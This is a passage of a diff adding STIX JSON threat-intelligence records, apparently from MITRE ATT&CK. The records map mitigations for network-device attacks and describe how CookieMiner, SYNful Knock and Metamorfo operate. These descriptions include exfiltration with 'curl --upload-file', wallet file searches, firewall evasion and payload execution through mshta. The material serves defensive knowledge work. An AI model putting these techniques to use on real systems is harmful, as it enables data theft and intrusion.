"source_name": "Cisco Securing SNMP", + "url": "https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/20370-snmpsecurity-20370.html", + "description": "Cisco. (2006, May 10). Securing Simple Network Management Protocol. Retrieved October 19, 2020." + }, + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:45:55.394Z", + "created": "2020-10-20T17:30:35.127Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--86598de0-b347-4928-9eb0-0acbfc21908c", + "target_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "relationship_type": "mitigates", + "description": "Segregate SNMP traffic on a separate management network (Citation: US-CERT TA17-156A SNMP Abuse 2017) ", + "id": "relationship--3dbcc83a-1e60-4ae4-a1f9-b37e1aa7d7b0", + "external_references": [ + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:45:55.411Z", + "created": "2020-10-20T17:30:35.150Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c", + "target_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "relationship_type": "mitigates", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific protocols, such as TFTP, can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific technique used by a particular adversary or tool, and will likely be different across various network configurations. ", + "id": "relationship--123c8150-c814-4bf2-b06f-e005cb257e17", + "type": "relationship", + "modified": "2020-10-22T16:35:54.003Z", + "created": "2020-10-20T17:59:20.709Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3", + "target_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "relationship_type": "mitigates", + "description": "Follow vendor device hardening best practices to disable unnecessary and unused features and services, avoid using default configurations and passwords, and introduce logging and auditing for detection.", + "id": "relationship--46ace311-9be9-4d4a-8ef0-fc2c0659fba9", + "type": "relationship", + "modified": "2020-10-22T16:35:54.314Z", + "created": "2020-10-20T17:59:21.115Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f", + "target_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "relationship_type": "mitigates", + "description": "Restrict use of protocols without encryption or authentication mechanisms. Limit access to administrative and management interfaces from untrusted network sources. ", + "id": "relationship--8dec7181-81a7-4f77-8b83-81e93cf09f10", + "type": "relationship", + "modified": "2020-10-22T16:35:54.116Z", + "created": "2020-10-20T17:59:21.220Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8", + "target_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "relationship_type": "mitigates", + "description": "Periodically check the integrity of the running configuration and system image to ensure they have not been modified. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification) (Citation: Cisco IOS Software Integrity Assurance - Image File Integrity) (Citation: Cisco IOS Software Integrity Assurance - Change Control) ", + "id": "relationship--f0488c32-f937-4eb9-8068-092795872582", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Integrity", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#30", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Image File Integrity. Retrieved October 21, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Change Control", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#31", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Change Control. Retrieved October 21, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:35:54.323Z", + "created": "2020-10-20T17:59:21.292Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb", + "target_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "relationship_type": "mitigates", + "description": "Enable secure boot features to validate the digital signature of the boot environment and system image using a special purpose hardware device. If the validation check fails, the device will fail to boot preventing loading of unauthorized software. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) ", + "id": "relationship--f8aff281-c6e4-47fd-8111-d1720126b49b", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Secure Boot", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:35:54.421Z", + "created": "2020-10-20T17:59:21.323Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "relationship_type": "mitigates", + "description": "Use of Authentication, Authorization, and Accounting (AAA) systems will limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse. TACACS+ can keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization. (Citation: Cisco IOS Software Integrity Assurance - AAA) (Citation: Cisco IOS Software Integrity Assurance - TACACS)", + "id": "relationship--6223d178-5cf3-4c84-84f1-583895468915", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - AAA", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#38", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - AAA. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - TACACS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#39", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:35:54.439Z", + "created": "2020-10-20T17:59:21.676Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb", + "target_ref": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "relationship_type": "mitigates", + "description": "Enable secure boot features to validate the digital signature of the boot environment and system image using a special purpose hardware device. If the validation check fails, the device will fail to boot preventing loading of unauthorized software. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) ", + "id": "relationship--6b6b9464-4d0c-4e7e-9631-e2a3cdac6260", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Secure Boot", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T02:18:19.708Z", + "created": "2020-10-20T19:09:23.924Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c", + "target_ref": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "relationship_type": "mitigates", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific protocols, such as TFTP, can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific technique used by a particular adversary or tool, and will likely be different across various network configurations. ", + "id": "relationship--e8dda697-0d9b-4c99-baa1-1d64f7dd5a02", + "type": "relationship", + "modified": "2020-10-22T02:18:19.735Z", + "created": "2020-10-20T19:09:24.030Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8", + "target_ref": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "relationship_type": "mitigates", + "description": "Periodically check the integrity of system image to ensure it has not been modified. (Citation: Cisco IOS Software Integrity Assurance - Image File Integrity) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification) (Citation: Cisco IOS Software Integrity Assurance - Change Control) ", + "id": "relationship--b2ac3f9c-b43a-417f-8f9f-0c86bee2e219", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Integrity", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#30", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Image File Integrity. Retrieved October 21, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Change Control", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#31", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Change Control. Retrieved October 21, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T02:18:19.762Z", + "created": "2020-10-20T19:09:24.323Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317", + "target_ref": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", + "relationship_type": "mitigates", + "description": "Use of Authentication, Authorization, and Accounting (AAA) systems will limit actions users can perform and provide a history of user actions to detect unauthorized use and abuse. Ensure least privilege principles are applied to user accounts and groups so that only authorized users can perform configuration changes. (Citation: Cisco IOS Software Integrity Assurance - AAA)", + "id": "relationship--f63970b4-a3fd-4fc9-8685-2baf0ff6ffff", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - AAA", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#38", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - AAA. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:43:38.557Z", + "created": "2020-10-20T19:26:05.603Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", + "relationship_type": "mitigates", + "description": "Use of Authentication, Authorization, and Accounting (AAA) systems will limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse. TACACS+ can keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization(Citation: Cisco IOS Software Integrity Assurance - AAA) (Citation: Cisco IOS Software Integrity Assurance - TACACS)", + "id": "relationship--edbdc10d-a3d6-46f8-9354-ba06995dce08", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - AAA", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#38", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - AAA. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - TACACS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#39", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:43:38.863Z", + "created": "2020-10-20T19:26:05.831Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db", + "target_ref": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", + "relationship_type": "mitigates", + "description": "TACACS+ can keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization. (Citation: Cisco IOS Software Integrity Assurance - TACACS)", + "id": "relationship--950d7968-6a24-44aa-8a17-4a9c5cb64f96", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - TACACS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#39", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:43:38.669Z", + "created": "2020-10-20T19:26:06.003Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has looked for files in the user's home directory with \"wallet\" in their name using find.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--5ea439b8-ca9d-462b-9bb5-e0f13651b10c", + "type": "relationship", + "modified": "2020-10-21T02:14:05.475Z", + "created": "2020-10-21T02:14:05.475Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has used the curl --upload-file command to exfiltrate data over HTTP.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--22d01548-0512-4acb-a386-51ec7a822329", + "type": "relationship", + "modified": "2020-10-21T02:14:05.494Z", + "created": "2020-10-21T02:14:05.494Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has used a Unix shell script to run a series of commands targeting macOS.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--dcbe360b-c7d3-45bd-a1ef-a13bc2a562fe", + "type": "relationship", + "modified": "2020-10-21T02:14:05.498Z", + "created": "2020-10-21T02:14:05.498Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has retrieved iPhone text messages from iTunes phone backup files.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--aff9bcd9-34b9-4c94-9ce0-dd4852118f91", + "type": "relationship", + "modified": "2020-10-21T02:14:05.535Z", + "created": "2020-10-21T02:14:05.535Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has checked for the presence of \"Little Snitch\", macOS network monitoring and application firewall software, stopping and exiting if it is found.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--bd17ac4f-746a-4299-b9cc-ff587c57e4f2", + "type": "relationship", + "modified": "2020-10-21T02:25:07.236Z", + "created": "2020-10-21T02:25:07.236Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--e1f316bc-b215-4a72-9108-7c5bd69f0454", + "type": "relationship", + "modified": "2020-10-21T02:25:07.250Z", + "created": "2020-10-21T02:25:07.250Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--84c1ecc6-e5a2-4e8a-bf4b-651a618e0053", + "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "external_references": [ + { + "source_name": "FireEye - Synful Knock", + "url": "https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html", + "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020." + } + ], + "description": "[SYNful Knock](https://attack.mitre.org/software/S0519) can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.(Citation: FireEye - Synful Knock)", + "relationship_type": "uses", + "id": "relationship--5d9b14c3-70ea-46b3-9b0d-1595c215efec", + "type": "relationship", + "modified": "2020-10-22T17:35:30.279Z", + "created": "2020-10-21T14:15:47.328Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--84c1ecc6-e5a2-4e8a-bf4b-651a618e0053", + "target_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "external_references": [ + { + "source_name": "FireEye - Synful Knock", + "url": "https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html", + "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + } + ], + "description": "[SYNful Knock](https://attack.mitre.org/software/S0519) is malware that is inserted into a network device by patching the operating system image.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution)", + "relationship_type": "uses", + "id": "relationship--1fbc7b2a-1cdb-455b-bd5a-b0ff29efe800", + "type": "relationship", + "modified": "2020-10-22T17:35:30.311Z", + "created": "2020-10-21T14:15:47.374Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.(Citation: FireEye Metamorfo Apr 2018) ", + "relationship_type": "uses", + "id": "relationship--6caff042-f300-421c-b6c8-6c8dd6d69f1b", + "type": "relationship", + "modified": "2020-10-21T22:48:31.298Z", + "created": "2020-10-21T16:25:56.742Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has displayed fake forms on top of banking sites to intercept credentials from victims.(Citation: FireEye Metamorfo Apr 2018) ", + "relationship_type": "uses", + "id": "relationship--5a56cf34-c344-4b2a-ac9e-4f08f049d7ce", + "type": "relationship", + "modified": "2020-10-21T17:01:35.472Z", + "created": "2020-10-21T17:01:35.472Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used mshta.exe to execute a HTA payload.(Citation: FireEye Metamorfo Apr 2018) ", + "relationship_type": "uses", + "id": "relationship--7643698c-2dc4-43ca-9d90-c656962dfecb", + "type": "relationship", + "modified": "2020-10-22T01:34:58.656Z", + "created": "2020-10-21T17:01:35.492Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", + "external_references": [ + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used MsiExec.exe to automatically execute files.(Citation: Fortinet Metamorfo Feb 2020) ", + "relationship_type": "uses", + "id": "relationship--184ee176-b599-4586-b1fc-5758c91a0c23", + "type": "relationship", + "modified": "2020-10-21T22:48:31.424Z", + "created": "2020-10-21T17:01:35.568Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has searched the system for an extensive list of Brazilian banking software.(Citation: FireEye Metamorfo Apr 2018)", + "relationship_type": "uses", + "id": "relationship--082b64f6-cc70-4bc8-a49f-bf0f125883f7", + "type": "relationship", + "modified": "2020-10-21T22:48:31.297Z", + "created": "2020-10-21T17:01:35.599Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has communicated with hosts over raw TCP on port 9999.(Citation: FireEye Metamorfo Apr 2018) ", + "relationship_type": "uses", + "id": "relationship--6cc8e1ce-c007-4a26-bd3b-cac73bb98c73", + "type": "relationship", + "modified": "2020-10-21T17:10:53.739Z", + "created": "2020-10-21T17:10:53.739Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 